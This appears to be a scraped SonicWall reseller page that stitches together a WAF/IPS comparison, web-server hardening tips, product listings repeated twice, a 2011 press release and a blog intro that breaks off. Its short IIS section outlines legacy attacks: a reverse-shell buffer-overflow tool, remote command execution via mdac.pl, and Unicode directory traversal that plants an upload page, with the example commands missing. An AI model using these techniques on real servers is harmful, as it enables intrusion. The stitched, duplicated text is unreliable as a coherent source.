Firewalls can greatly reduce chances of a DDoS. Firewall settings play an important rule. ICMP echo can be denied. A three way handshake can be set mandatory validated by the firewall instead of forwarding the request to the server. This will stop an SYN flood.

Routers and Switches

Switches can deep scan incoming packets and look for a pattern. If the pattern seems odd, they can be filtered off before reaching the server. This is called ingress and egress filtering.

Combining the evolution of IPS solutions with aggressive marketing some IPS (only) vendors claim complete web application protection, often making reference to the OWASP Top 10 Web Application Security Risks threats list to argument their offer; but is it so?

At a glance IPS and WAFs look similar in certain ways; they both can be hardware or software based or have similar deployment modes.

If we look closer we will notice that currently the IPS tends to be integrated into an UTM gateway or NGFW(closer integration) whereas the WAF can be made part of a remote access solution which includes various VPN features.
Rare cases when the WAF is integrated into an UTM or NGFW; both can be found offered as standalone solutions.

The WAF usually addresses inbound access to web applications; specialized coverage.
The IPS can address inbound and outbound access; broader coverage.

On the other side, the WAF can also make use of attack signatures but due to its layer of intelligence can deal better with evasion attacks.

Can intercept and modify both application requests and responses, thus can sanitize the requests and prevent the leak of unwanted responses like error messages.

Can mitigate against potential 0-days injection attacks because it can apply positive logic: consider the case of a login web page where user input is not filtered appropriately on the application itself; the WAF can detect the login page, the login form and filter as instructed the user input.

Additionally the IPS cannot proactively block CSRF attacks, while the WAF can by adding a token to users' URLs and upon submission verifying if the correct token was supplied or by checking the Referer HTTP header.
Plus the WAF can provide features like authentication and authorization.
 

The WAF specializes in providing protection against web applications and databases attacks, while the IPS includes part of its wider protection suite limited mitigation against web applications attacks concomitantly addressing many other threats like worms or network attacks.

•    Key differences between WAF and IPS – the WAF has web application logic while the IPS covers a wide range of attacks occurring over various protocols and provides higher throughput.

When it comes to attacks against web applications, the IPS rather includes a negative model; provides signatures for known generic attacks plus specific attacks against various web applications(like XSS in Microsoft SharePoint Server 2007 CVE-2010-0817). It does not understand the application context of requests or responses as it does not have web application state knowledge.
Susceptible to advanced evasion techniques.

The case of SonicWall

Offers both IPS and WAF solutions.

The IPS is deeply integrated into SonicWall's NGFW through the NSA series for better management and threat coverage, while the WAF is available as a service part of the enterprise remote access solution through the SRA series.

They can make use of dynamically updated signatures.

Conclusion

The IPS offers some protections for web applications; however WAF's capabilities are superior in this area; so for advanced overall threat coverage(inbound + outbound access) you need both.
They will probably not merge anytime soon for example due to performance reasons.


 

IIS, Internet Information Services is a web server application that is shipped with the Windows operating system. It is one of the most widely used web server. IIS has some major loop holes that can compromise the security of your server.

IIS Interrogation

If someone is going to try to hack through a web server application such as IIS, he will first gather information regarding your system. Using techniques such as banner grabbing or using a vulnerability scanner, he may dig some useful information and focus on a specific machine. Assume, a malicious hacker has successful identified the web server as IIS and Windows NT as the operating system.

Buffer Overflow

Buffer overflow occurs when a program overflows the memory available to its buffer. One of the DLL files in the IIS can be exploited due to a buffer overflow flaw.
Jill is an exploit that causes a buffer overflow and connects a remote shell back.
First, the attacker will start a listening service on his system.

Then run the Jill exploit

And the attacker is in!
(iis5hack and jill-win32 are other tools that implement this exploit)

MDAC Local Command Execution

MDAC is a scary component of IIS that allows a remote attacker to execute a command on the local machine.
A readymade exploit is available at www.wiretrip.net/rfp called mdac.pl

If the victim is vulnerable, the mdac.pl will ask for a command to execute on the victim's system. Someone with the wrong intentions can wreck havoc in a few commands.

IIS Directory Hack

This one occurs due to a problem in interpreting "/" and "\" in a URL by IIS.
The Unicode for these special characters are %c0%af and %c1%9c respectively. The attack works by embedding a command in the URL after these unicodes and injecting through HTTP. IIS will parse the command as valid, and execute it locally.
An example URL could be

unicodeloader.pl is an exploit that uses this flaw to compromise a remote system. It creates a webpage on the system that is accessible to the attacker and allows to upload anything on the server.

This command will make a file upload.asp on victim server that will allow the attacker to upload anything on the remote path given in the command.

Defense

IIS has a solid support of developers that fix many of its vulnerabilities. Keeping up with the updates, versions and hot fixes will keep your system immune to most of the exploits.
Install IIS on a different drive than the one used by your OS. Stay away from C:/> drive. It's too common.
Unmap all unused DLL components and extensions.

Some people may not realize it but there isn’t a straight definition for a WAF. We can refer to it as to a network or host based  security technology that acts as middle man analyzing layer 7 traffic flow(at session level not at packet level) with the purpose of enhancing the security of a web application.

SonicWall’s WAF approach

Appliance based solution with a reverse proxy architecture.
The WAF is subscription-based software that runs on the SonicWALL SRA or SSLVPN appliance and protects the web applications running on servers behind the appliance.

The WAF is a component of a complete enterprise remote access solution.
Both hardware and virtual appliance are available.

What a WAF can do?

To mention a few capabilities:
•    » Virtual patching - although ideally you would fix the code itself, in practice this is not always possible; consider the case of a commercial web application, you will have to wait for a patch from the vendor and the patch may never come(CVE-2010-3213 and MS OWA 2003).
•    » Web application hardening - attack surface reduction; limit the request HTTP methods, HTTP headers or user input allowed; proactively mitigate CSRF vulnerabilities by appending a token to users’ URLs and upon submission verify if the correct token was supplied.
•    » Web Server hardening - protect the web server against various attacks with signatures or simply by proxying the requests(proactive protection against attacks like Slowloris HTTP DoS) and limit the allowed HTTP features(block the use of WebDav).
•    » HTTP protocol validation - mitigate against protocol exploits and evasion techniques.

But I have an IPS

The main difference between an IPS and a WAF is the application logic, the WAF has application state awareness.
A WAF keeps track of the application specific context of requests and responses; an IPS rather follows the packet flow doing some form of protocol inspection and searching for known attacks patterns.

The WAF is able to follow the data flow, for example validating user input per a specific web form.
The IPS on the other hand, does not really understand that the web form should be submitted using POST and that only numbers are supposed to be considered valid user input; or the IPS cannot proactively mitigate Cross-site Request Forgery(CSRF) vulnerabilities.

What SonicWall’s WAF offers?

Multiple protection levels and features are available.

»    Injection attack protection: XSS, SQLi.
»    CSRF protection.
»    HTTPS traffic inspection.
»    Positive security model with rules: blocks form submission with unwanted parameters, bad login, malicious input to a form, etc.
»    Negative security model: dynamically updated signature database.
»    Virtual Patching.
»    Cloaking: filters out response headers that could provide information to clients about the backend web server.
»    Web server protection.
»    Application layer DoS protection: protection against Slowloris; rate limiter.
»    Strong authentication: token-based two-factor authentication, client certificate authentication and tokenless one-time passwords.
»    Strong authorization: granular access policies based on hostname, subnet, IP address, port and URL path.
»    Anti-evasion capabilities: using request normalization.
»    Forced browsing: prevent the enumeration and access of resources that are not referenced by an application, but are still accessible.
»    HTTP protocol validation.
»    Reporting and Monitoring.
»    SSL hardware acceleration.
»    Content Caching.
»    GZIP compression.

Where is the threat?

This is a typical web application architecture layout. The arrows between each of the layer are the transport protocol HTTP.

Each of these (including HTTP as a transport mechanism) are prone to hacking. Any of these can be compromised to give complete access to your network.

Transport

HTTP is the de facto standard protocol for communication. As we have seen in a previous post on banner grabbing, HTTP is very insecure and reveals critical information.

HTTP is a stateless protocol. It takes a request and responds. However, cookies are used to implement some sort of state or session.

SSL (secured socket layer) is a protocol that provides encryption for HTTP. This resolves one issue with HTTP that is clear text communication. Used in sites that deal with credit card information.

Web Servers

Web servers integrate the applications and client. Apache and IIS (Microsoft) are the most widely used.

Apache is a secure server, however some of its versions have vulnerabilities that could be fatal. Most of these vulnerabilities come from additional modules that are added to the server.

IIS (Internet Information System) is widely used and has been through some major attacks

Harden your Web Server

The most important step in hardening a web server is patching religiously. Both Apache and IIS have a strong development team that release security patches as soon as a loop hole is found.

Implement appropriate network egress filtering. Using a firewall, you can deny all outbound connections and replies (except legitimate established connections).

Some free vulnerability scanners can be used find security holes in your server.

Nikto(http://www.cirt.net/nikto2) is a free web scanning utility that can provide you with a comprehensive report of vulnerabilities in your server. Nikto is not a stealth scanner and will show up in log files, so use it for testing purposes only.

Paros Proxy, Burp Suite and Typhoon are other free alternatives to find vulnerabilities in your web server. For a more professional and aggressive scan, you may want to invest in a commercial tool such as Acunetix Enterprise Web Vulnerability Scanner(http://www.acunetix.com/).

The SonicWALL® WAN Acceleration Appliance (WXA) Series reduces application latency and conserves bandwidth, significantly enhancing WAN application performance and user experience for small- to medium-sized organizations with remote and branch offices. After initial data transfer, the WXA Series dramatically reduces all subsequent traffic by transmitting only new or changed data across the network. The WXA de-duplicates data traversing the WAN, thus reducing application latency and conserving bandwidth. Other acceleration features include data caching, metadata caching and data-in-flight compression.

WXA solutions are integrated add-ons to SonicWALL E-Class Network Security Appliance (NSA), NSA and TZ Series appliances that are deployed as Next-Generation Firewalls. This integrated solution streamlines the placement, deployment, configuration, routing, management and integration of WXA with other components, such as VPNs. When deployed in conjunction with SonicWALL Application Intelligence and Control Service, the WXA offers the unique combined benefit of both prioritizing application traffic (using QoS or bandwidth management) and minimizing traffic between sites, resulting in optimal network performance.

Features & Benefits:

• » Simplified deployment through complete provisioning and configuration by a SonicWALL firewall drastically reduces the complexity of deploying, routing and integrating multiple WXA appliances across the network.
• » Increased security using SonicWALL Reassembly-Free Deep Packet Inspection™ technology provides an additional layer of security by scanning all traffic and data for threats before sending it to the WAN acceleration appliance.
• » Protocol optimization provides LAN-like application performance for users accessing resources over the WAN by decreasing the latency and chattiness presented by inefficient protocols or application communication.
• » Byte caching and file caching reduce bandwidth consumption by orders of magnitude, extending the life of existing WAN links and providing a better user experience.
• » Reduced total cost of ownership (TCO) arrives through increased efficiency and overall utilization of existing WAN bandwidth, which in turn avoids costly and unnecessary WAN upgrades.
• » Data compression across the WAN increases performance and reduces latency.
• » Windows File Sharing (WFS) acceleration helps improve response times while decreasing the amount of data transferred when downloading or accessing files from a shared drive.
• » Visualization delivers real-time insight into the performance gains obtained by introducing WAN acceleration into the network.

Deployment Scenarios:

SonicWALL WXA Model Comparison

Specifications	WXA 4000	WXA 2000
Platform	Hardware Appliance	Hardware Appliance
Maximum Users	240	120
Maximum Flows	1200	600
Features	WXA 4000	WXA 2000
Byte Caching
Protocols
TCP/File Compression
WFS Acceleration
Management
TCP/File Compression
WFS Acceleration
SNMP
Syslog
Management	SSH, GUI
Hardware	WXA 4000	WXA 2000
Form	Hardened SonicWALL Linux OS
Rack-mount Chassis	1 RU	1 RU
CPU	Intel Dual Core 2.0GHz	Intel 2.0GHz
RAM	4 GB	2 GB
Hard Drive	2x250 GB	2x250 GB
Redundant Disk Array (RAID)	RAID 1
Dimensions	17.0 x 16.4 x 1.7 in (43.18 x 41.59 x 4.44 cm)	17.0 x 16.4 x 1.7 in (43.18 x 41.59 x 4.44 cm)
Weight	16 lbs/7.26 kg	16 lbs/7.26 kg
WEEE Weight	16 lbs/7.37 kg	16 lbs/7.37 kg
Power Consumption (Watts)	101	86
BTUs	344	293
MTBF (Years)	14.7	14.7

Items 1 to 20 of 28 total

Show 10 20 50 75 100 200 per page

Sort By Position Name

1. 
   
   
   Finding Best Price...

   SonicWALL WAN Acceleration Appliance WXA 2000 with 1 Year of Dynamic Support 24x7

   SonicWALL WAN Acceleration Appliance (WXA) 2000 reduces application latency and conserves bandwidth, significantly enhancing WAN application performance and user experience.
   » Small- to Medium-sized organizations
   » Up to 120 users
   » With 600 concurrent flows

   • Request a Quote
2. 
   
   
   Finding Best Price...

   SonicWALL Dynamic Support 24x7 for WXA 5000 Virtual Appliance (1 Year)

   Designed for customers who need continued protection through on-going firmware updates and advanced technical support for their SonicWALL WXA 5000 Virtual Appliance , this one year subscription of SonicWALL Dynamic Support is available any time you ask for it (24X7) depending on your need.

   • Request a Quote
3. 
   
   
   Finding Best Price...

   SonicWALL Dynamic Support 24x7 for WXA 5000 Virtual Appliance (2 Year)

   Designed for customers who need continued protection through on-going firmware updates and advanced technical support for their SonicWALL WXA 5000 Virtual Appliance , this two year subscription of SonicWALL Dynamic Support is available any time you ask for it (24X7) depending on your need.

   • Request a Quote
4. 
   
   
   Finding Best Price...

   SonicWALL Dynamic Support 24x7 for WXA 5000 Virtual Appliance (3 Year)

   Designed for customers who need continued protection through on-going firmware updates and advanced technical support for their SonicWALL WXA 5000 Virtual Appliance , this three year subscription of SonicWALL Dynamic Support is available any time you ask for it (24X7) depending on your need.

   • Request a Quote
5. 
   
   
   Finding Best Price...

   SonicWALL Dynamic Support 24x7 and Software Subscription for WXA 500 Live CD (1 Year)

   Designed for customers who need continued protection through on-going firmware updates and advanced technical support for their SonicWALL WXA 500 Live CD , this one year subscription of SonicWALL Dynamic Support is available any time you ask for it (24X7) depending on your need.

   • Request a Quote
6. 
   
   
   Finding Best Price...

   SonicWALL Dynamic Support 24x7 and Software Subscription for WXA 500 Live CD (2 Year)

   Designed for customers who need continued protection through on-going firmware updates and advanced technical support for their SonicWALL WXA 500 Live CD , this two year subscription of SonicWALL Dynamic Support is available any time you ask for it (24X7) depending on your need.

   • Request a Quote
7. 
   
   
   Finding Best Price...

   SonicWALL Dynamic Support 24x7 and Software Subscription for WXA 500 Live CD (3 Year)

   Designed for customers who need continued protection through on-going firmware updates and advanced technical support for their SonicWALL WXA 500 Live CD , this three year subscription of SonicWALL Dynamic Support is available any time you ask for it (24X7) depending on your need.

   • Request a Quote
8. 
   
   
   Finding Best Price...

   SonicWALL WXA 500 Live CD with 1 Year of Software subscription and Dynamic Support 24x7

   SonicWALL WXA 500 reduces application latency, conserves network bandwidth, and improves the end user experiences, and it’s delivered as software for use on a dedicated hardware platform
   » For small Office
   » Designed for up to 20 users
   » With 100 concurrent flows

   • Request a Quote
9. 
   
   
   Finding Best Price...

   SonicWALL WXA 5000 with 1 Year of Software subscription and Dynamic Support 24x7

   The WXA 5000 virtual appliance improves application performance through innovative WAN acceleration and optimization technology, while reducing capital costs through virtualization.
   » Virtual Appliance
   » Up to 120 users
   » Reduces capital costs through virtualization

   • Request a Quote
10. 
    
    
    Finding Best Price...

    Intrusion Prevention and Anti-Malware for E10100 (1 Year)

    This is a 1 year subscription of Intrusion Prevention and Anti-Malware for E10100. SonicWALL Intrusion Prevention Service (IPS) engine protects against an array of network-based application vulnerabilities and exploits. And malware are prevented with dynamically updated databases and an extensive list of virus and malware signatures.

    • Request a Quote
11. 
    
    
    Finding Best Price...

    Intrusion Prevention and Anti-Malware for E10100 (2 Year)

    This is a 2 year subscription of Intrusion Prevention and Anti-Malware for E10100. SonicWALL Intrusion Prevention Service (IPS) engine protects against an array of network-based application vulnerabilities and exploits. And malware are prevented with dynamically updated databases and an extensive list of virus and malware signatures.

    • Request a Quote
12. 
    
    
    Finding Best Price...

    Intrusion Prevention and Anti-Malware for E10100 (3 Year)

    This is a 3 year subscription of Intrusion Prevention and Anti-Malware for E10100. SonicWALL Intrusion Prevention Service (IPS) engine protects against an array of network-based application vulnerabilities and exploits. And malware are prevented with dynamically updated databases and an extensive list of virus and malware signatures.

    • Request a Quote
13. 
    
    
    Finding Best Price...

    Intrusion Prevention and Anti-Malware for E10200 (1 Year)

    This is a 1 year subscription of Intrusion Prevention and Anti-Malware for E10200 . SonicWALL Intrusion Prevention Service (IPS) engine protects against an array of network-based application vulnerabilities and exploits. And malware are prevented with dynamically updated databases and an extensive list of virus and malware signatures.

    • Request a Quote
14. 
    
    
    Finding Best Price...

    Intrusion Prevention and Anti-Malware for E10200 (2 Year)

    This is a 2 year subscription of Intrusion Prevention and Anti-Malware for E10200 . SonicWALL Intrusion Prevention Service (IPS) engine protects against an array of network-based application vulnerabilities and exploits. And malware are prevented with dynamically updated databases and an extensive list of virus and malware signatures.

    • Request a Quote
15. 
    
    
    Finding Best Price...

    Intrusion Prevention and Anti-Malware for E10200 (3 Year)

    This is a 3 year subscription of Intrusion Prevention and Anti-Malware for E10200 . SonicWALL Intrusion Prevention Service (IPS) engine protects against an array of network-based application vulnerabilities and exploits. And malware are prevented with dynamically updated databases and an extensive list of virus and malware signatures.

    • Request a Quote
16. 
    
    
    Finding Best Price...

    Intrusion Prevention and Anti-Malware for E10400 (1 Year)

    This is a 1 year subscription of Intrusion Prevention and Anti-Malware for E10400. SonicWALL Intrusion Prevention Service (IPS) engine protects against an array of network-based application vulnerabilities and exploits. And malware are prevented with dynamically updated databases and an extensive list of virus and malware signatures.

    • Request a Quote
17. 
    
    
    Finding Best Price...

    Intrusion Prevention and Anti-Malware for E10400 (2 Year)

    This is a 2 year subscription of Intrusion Prevention and Anti-Malware for E10400. SonicWALL Intrusion Prevention Service (IPS) engine protects against an array of network-based application vulnerabilities and exploits. And malware are prevented with dynamically updated databases and an extensive list of virus and malware signatures.

    • Request a Quote
18. 
    
    
    Finding Best Price...

    Intrusion Prevention and Anti-Malware for E10400 (3 Year)

    This is a 3 year subscription of Intrusion Prevention and Anti-Malware for E10400. SonicWALL Intrusion Prevention Service (IPS) engine protects against an array of network-based application vulnerabilities and exploits. And malware are prevented with dynamically updated databases and an extensive list of virus and malware signatures.

    • Request a Quote
19. 
    
    
    Finding Best Price...

    Intrusion Prevention and Anti-Malware for E10800 (1 Year)

    This is a 1 year subscription of Intrusion Prevention and Anti-Malware for E10800. SonicWALL Intrusion Prevention Service (IPS) engine protects against an array of network-based application vulnerabilities and exploits. And malware are prevented with dynamically updated databases and an extensive list of virus and malware signatures.

    • Request a Quote
20. 
    
    
    Finding Best Price...

    Intrusion Prevention and Anti-Malware for E10800 (2 Year)

    This is a 2 year subscription of Intrusion Prevention and Anti-Malware for E10800. SonicWALL Intrusion Prevention Service (IPS) engine protects against an array of network-based application vulnerabilities and exploits. And malware are prevented with dynamically updated databases and an extensive list of virus and malware signatures.

    • Request a Quote

Items 1 to 20 of 28 total

Show 10 20 50 75 100 200 per page

Sort By Position Name

Network Optimization

IT often tries to improve Wide Area Network (WAN) performance by expending budget on more bandwidth or enhanced services. Instead of continuing a perpetual cycle of buying additional bandwidth, why not optimize the existing WAN bandwidth you already have and refresh your network security solution at the same time? SonicWALL® uniquely consolidates enterprise-class Application Intelligence and Control, Deep Packet Inspection Scanning, as well as WAN Acceleration for the distributed enterprise. This article outlines 10 ways SonicWALL solutions can help optimize bandwidth, enhance performance, and increase employee productivity, without sacrificing security.

1. Data De-duplication

Distributed network application users collaborating with co-workers often retransmit entire files multiple times, unnecessarily sending the same data over and over. Data de-duplication via byte and file caching reduces bandwidth consumption and lowers latency by orders of magnitude, delivering faster response times and a better experience for all users. 

2. Windows File Share Acceleration

With Windows® File Sharing (WFS), multiple users accessing the same file across a WAN can increase the bandwidth required when accessing the same data. Transmitting only changed data instead of entire data structures significantly improves response times for users while reducing bandwidth consumption.

3. Protocol Optimization

Applications designed to work in a Local Area Network (LAN) environment may not work as well over a WAN connection because of chattiness or inefficiencies in how the application communicates. Protocol optimization delivers snappy, LAN-like application performance for users accessing shared resources over the WAN.

4. Data Compression

Today's sophisticated applications generate an ever-growing volume of network traffic. Data compression across the WAN increases performance and reduces latency.

5. Application Intelligence

There is a rapidly increasing, high volume of application traffic on today's networks that can overburden existing WAN solutions. Application-intelligent firewalls visualize and filter non-productive and dangerous applications while forwarding business critical applications.

6. Blocking Undesirable Applications

Employee use of time-wasting and dangerous applications poses additional challenges for IT. Application Intelligence and Control provides the tools for the administrator to identify and block potentially dangerous application traffic such as peer-to-peer (P2P), instant messaging and rogue applications.

7. Bandwidth-managing Applications

Critical business applications need bandwidth prioritization, while social media and video streaming applications may need to be bandwidth-throttled or completely blocked.

8. Increasing Security

With other WAN optimization solutions, the administrator must choose to deploy the solution inside or outside the security boundary, often leaving the network vulnerable. SonicWALL Next-Generation Firewalls provide Reassembly-Free Deep Packet Inspection™ for both malware protection and intrusion prevention across all traffic–regardless of file size within your network, without compromising network performance.

9. Real-time Visualization

Real-time visualization delivers tools for administrators to gain strategic insight into the performance gains and see the cost savings obtained by WAN acceleration, while continuing to identify undesirable or unsafe application usage, which enables IT to effectively secure and control the network, and further minimize TCO.

10. Effortless Deployment and Manageability

Designed for effortless manageability, SonicWALL reduces complexity through automatic provisioning of the WXA appliance to streamline the placement, deployment, and configuration management. Providing a consolidated management into a single interface helps ease the cost of deployment and lowers total cost of ownership by minimizing infrastructure, training and administrative overhead.

Network Optimization by SonicWALL

SonicWALL delivers Network Optimization for the enterprise, uniquely consolidating Application Intelligence and Control, Deep Packet Inspection Scanning, Visualization, Deployment, Management, as well as WAN Acceleration for the distributed enterprise. The platform allows IT to transition to an advanced security platform that can secure and control against today's constantly evolving threats and application-related issues.

SonicWALL WAN Acceleration Appliance Series

The SonicWALL WAN Acceleration Appliance (WXA) Series significantly enhances WAN application performance and improves the end user experience for distributed enterprises and small- to medium-sized organizations with remote and branch offices. After initial file transfer, the WXA Series dramatically reduces all subsequent traffic by transmitting only new or changed data across the network. The SonicWALL WAN Acceleration Appliance (WXA) Series is comprised of the WXA 500 Live CD, WXA 2000 and WXA 4000 hardware appliances, and WXA 5000 Virtual Appliance.

Items 1 to 20 of 28 total

Show 10 20 50 75 100 200 per page

Sort By Position Name

1. 
   
   
   Finding Best Price...

   SonicWALL WAN Acceleration Appliance WXA 2000 with 1 Year of Dynamic Support 24x7

   SonicWALL WAN Acceleration Appliance (WXA) 2000 reduces application latency and conserves bandwidth, significantly enhancing WAN application performance and user experience.
   » Small- to Medium-sized organizations
   » Up to 120 users
   » With 600 concurrent flows

   • Request a Quote
2. 
   
   
   Finding Best Price...

   SonicWALL Dynamic Support 24x7 for WXA 5000 Virtual Appliance (1 Year)

   Designed for customers who need continued protection through on-going firmware updates and advanced technical support for their SonicWALL WXA 5000 Virtual Appliance , this one year subscription of SonicWALL Dynamic Support is available any time you ask for it (24X7) depending on your need.

   • Request a Quote
3. 
   
   
   Finding Best Price...

   SonicWALL Dynamic Support 24x7 for WXA 5000 Virtual Appliance (2 Year)

   Designed for customers who need continued protection through on-going firmware updates and advanced technical support for their SonicWALL WXA 5000 Virtual Appliance , this two year subscription of SonicWALL Dynamic Support is available any time you ask for it (24X7) depending on your need.

   • Request a Quote
4. 
   
   
   Finding Best Price...

   SonicWALL Dynamic Support 24x7 for WXA 5000 Virtual Appliance (3 Year)

   Designed for customers who need continued protection through on-going firmware updates and advanced technical support for their SonicWALL WXA 5000 Virtual Appliance , this three year subscription of SonicWALL Dynamic Support is available any time you ask for it (24X7) depending on your need.

   • Request a Quote
5. 
   
   
   Finding Best Price...

   SonicWALL Dynamic Support 24x7 and Software Subscription for WXA 500 Live CD (1 Year)

   Designed for customers who need continued protection through on-going firmware updates and advanced technical support for their SonicWALL WXA 500 Live CD , this one year subscription of SonicWALL Dynamic Support is available any time you ask for it (24X7) depending on your need.

   • Request a Quote
6. 
   
   
   Finding Best Price...

   SonicWALL Dynamic Support 24x7 and Software Subscription for WXA 500 Live CD (2 Year)

   Designed for customers who need continued protection through on-going firmware updates and advanced technical support for their SonicWALL WXA 500 Live CD , this two year subscription of SonicWALL Dynamic Support is available any time you ask for it (24X7) depending on your need.

   • Request a Quote
7. 
   
   
   Finding Best Price...

   SonicWALL Dynamic Support 24x7 and Software Subscription for WXA 500 Live CD (3 Year)

   Designed for customers who need continued protection through on-going firmware updates and advanced technical support for their SonicWALL WXA 500 Live CD , this three year subscription of SonicWALL Dynamic Support is available any time you ask for it (24X7) depending on your need.

   • Request a Quote
8. 
   
   
   Finding Best Price...

   SonicWALL WXA 500 Live CD with 1 Year of Software subscription and Dynamic Support 24x7

   SonicWALL WXA 500 reduces application latency, conserves network bandwidth, and improves the end user experiences, and it’s delivered as software for use on a dedicated hardware platform
   » For small Office
   » Designed for up to 20 users
   » With 100 concurrent flows

   • Request a Quote
9. 
   
   
   Finding Best Price...

   SonicWALL WXA 5000 with 1 Year of Software subscription and Dynamic Support 24x7

   The WXA 5000 virtual appliance improves application performance through innovative WAN acceleration and optimization technology, while reducing capital costs through virtualization.
   » Virtual Appliance
   » Up to 120 users
   » Reduces capital costs through virtualization

   • Request a Quote
10. 
    
    
    Finding Best Price...

    Intrusion Prevention and Anti-Malware for E10100 (1 Year)

    This is a 1 year subscription of Intrusion Prevention and Anti-Malware for E10100. SonicWALL Intrusion Prevention Service (IPS) engine protects against an array of network-based application vulnerabilities and exploits. And malware are prevented with dynamically updated databases and an extensive list of virus and malware signatures.

    • Request a Quote
11. 
    
    
    Finding Best Price...

    Intrusion Prevention and Anti-Malware for E10100 (2 Year)

    This is a 2 year subscription of Intrusion Prevention and Anti-Malware for E10100. SonicWALL Intrusion Prevention Service (IPS) engine protects against an array of network-based application vulnerabilities and exploits. And malware are prevented with dynamically updated databases and an extensive list of virus and malware signatures.

    • Request a Quote
12. 
    
    
    Finding Best Price...

    Intrusion Prevention and Anti-Malware for E10100 (3 Year)

    This is a 3 year subscription of Intrusion Prevention and Anti-Malware for E10100. SonicWALL Intrusion Prevention Service (IPS) engine protects against an array of network-based application vulnerabilities and exploits. And malware are prevented with dynamically updated databases and an extensive list of virus and malware signatures.

    • Request a Quote
13. 
    
    
    Finding Best Price...

    Intrusion Prevention and Anti-Malware for E10200 (1 Year)

    This is a 1 year subscription of Intrusion Prevention and Anti-Malware for E10200 . SonicWALL Intrusion Prevention Service (IPS) engine protects against an array of network-based application vulnerabilities and exploits. And malware are prevented with dynamically updated databases and an extensive list of virus and malware signatures.

    • Request a Quote
14. 
    
    
    Finding Best Price...

    Intrusion Prevention and Anti-Malware for E10200 (2 Year)

    This is a 2 year subscription of Intrusion Prevention and Anti-Malware for E10200 . SonicWALL Intrusion Prevention Service (IPS) engine protects against an array of network-based application vulnerabilities and exploits. And malware are prevented with dynamically updated databases and an extensive list of virus and malware signatures.

    • Request a Quote
15. 
    
    
    Finding Best Price...

    Intrusion Prevention and Anti-Malware for E10200 (3 Year)

    This is a 3 year subscription of Intrusion Prevention and Anti-Malware for E10200 . SonicWALL Intrusion Prevention Service (IPS) engine protects against an array of network-based application vulnerabilities and exploits. And malware are prevented with dynamically updated databases and an extensive list of virus and malware signatures.

    • Request a Quote
16. 
    
    
    Finding Best Price...

    Intrusion Prevention and Anti-Malware for E10400 (1 Year)

    This is a 1 year subscription of Intrusion Prevention and Anti-Malware for E10400. SonicWALL Intrusion Prevention Service (IPS) engine protects against an array of network-based application vulnerabilities and exploits. And malware are prevented with dynamically updated databases and an extensive list of virus and malware signatures.

    • Request a Quote
17. 
    
    
    Finding Best Price...

    Intrusion Prevention and Anti-Malware for E10400 (2 Year)

    This is a 2 year subscription of Intrusion Prevention and Anti-Malware for E10400. SonicWALL Intrusion Prevention Service (IPS) engine protects against an array of network-based application vulnerabilities and exploits. And malware are prevented with dynamically updated databases and an extensive list of virus and malware signatures.

    • Request a Quote
18. 
    
    
    Finding Best Price...

    Intrusion Prevention and Anti-Malware for E10400 (3 Year)

    This is a 3 year subscription of Intrusion Prevention and Anti-Malware for E10400. SonicWALL Intrusion Prevention Service (IPS) engine protects against an array of network-based application vulnerabilities and exploits. And malware are prevented with dynamically updated databases and an extensive list of virus and malware signatures.

    • Request a Quote
19. 
    
    
    Finding Best Price...

    Intrusion Prevention and Anti-Malware for E10800 (1 Year)

    This is a 1 year subscription of Intrusion Prevention and Anti-Malware for E10800. SonicWALL Intrusion Prevention Service (IPS) engine protects against an array of network-based application vulnerabilities and exploits. And malware are prevented with dynamically updated databases and an extensive list of virus and malware signatures.

    • Request a Quote
20. 
    
    
    Finding Best Price...

    Intrusion Prevention and Anti-Malware for E10800 (2 Year)

    This is a 2 year subscription of Intrusion Prevention and Anti-Malware for E10800. SonicWALL Intrusion Prevention Service (IPS) engine protects against an array of network-based application vulnerabilities and exploits. And malware are prevented with dynamically updated databases and an extensive list of virus and malware signatures.

    • Request a Quote

Items 1 to 20 of 28 total

Show 10 20 50 75 100 200 per page

Sort By Position Name

SAN JOSE, Calif., June 28, 2011 /PRNewswire/ -- SonicWALL, Inc., the leading provider of intelligent network security and data protection solutions, today announced the availability of WAN Acceleration in SonicOS 5.8.1, further enhancing the capabilities of the current SonicWALL Next-Generation Firewall (NGFW) Series and introducing integrated support for the SonicWALL WAN Acceleration Appliance (WXA) Series. Today's announcement underscores SonicWALL's commitment to continued investment in its NGFW series and to providing its customers with a highly secure, accelerated and optimized network that drives business and employee efficiency.

The delivery of SonicOS 5.8.1 bolsters SonicWALL's consolidated security platformand tightly integrates features like application intelligence, control and visualization and deep packet inspection scanning with the WXA Series to provide WAN optimization and acceleration for the distributed enterprise. The WAN acceleration is seamlessly built into the existing SonicOS user interface, self-discovers and allows system administrators to easily leverage the new and advanced features.

"A key requirement for the ongoing success of our business is a secure and efficient network that we can manage in a smart way," said Michael E. Crean, president of Solutions Granted. "With the combined power of SonicOS 5.8.1 and the WXA Series, we drive business and employee productivity in two ways. Firstly, we leverage application intelligence and control features to optimize the applications on the network for our business needs. In addition, we can now transmit business-critical data faster and effectively increase our bandwidth - this saves us time, money and helps us drive profitability."

Additional new features offered by SonicOS 5.8.1 enhance application intelligence and security features in SonicWALL firewalls. The new capability to use IP reputation data to block communication with suspected botnet command and control centers allows administrators to reduce the risk of having potentially compromised hosts on their network participate in spam or DDoS attacks. Administrators can further reduce the risk of data theft or attacks by controlling traffic access by geography or blocking of traffic from unknown locations.

Key benefits include:

• » Ability to detect and block communications to botnet command and control communication centers identified by the SonicWALL GRID network
• » Ability to view and control traffic by geography, thus providing an additional layer of security by reducing the risk of attacks or data theft
• » Ease of Use enhancements for application flow visualization that provide easier methods to quickly create policies based on real-time application traffic insight to simplify network management
• » Increased deployment flexibility with Wire Mode and new opportunities for Deep Packet Inspection that provides greater security and application control

 "As the data that businesses transmit on their networks grows exponentially, so does the need to increase the efficiency of firewall protection. The introduction of SonicOS 5.8.1 further enhances SonicWALL's NGFW offering and improves bandwidth capability, while protecting against instrusions and malware attacks," said Patrick Sweeney, vice president product management and corporate marketing at SonicWALL.

The SonicWALL Network Efficiencies Solution is a tightly integrated security and WAN Acceleration solution. It integrates SonicWALL Application Intelligence and Control and SonicWALL Deep Packet Inspection with the WXA Series and enables businesses to better manage their bandwidth to accelerate business critical applications. Corporations can consolidate features for application intelligence and control, DPI scanning, WAN Acceleration and VPN into a single interface. This can help companies save on IT management costs, reduce the amount of data being sent between corporate and remote offices and drive profitability.

For more news on Dynamic Security and Next-Generation Networks, follow SonicWALL on Facebook and Twitter.

There is no secret that malware is a big threat to organizations of all sizes.
There are many places for malware to infiltrate into an organization. One such way would be through web surfing. In this blog entry we will focus on drive-by-downloads through iframes.

How it works?

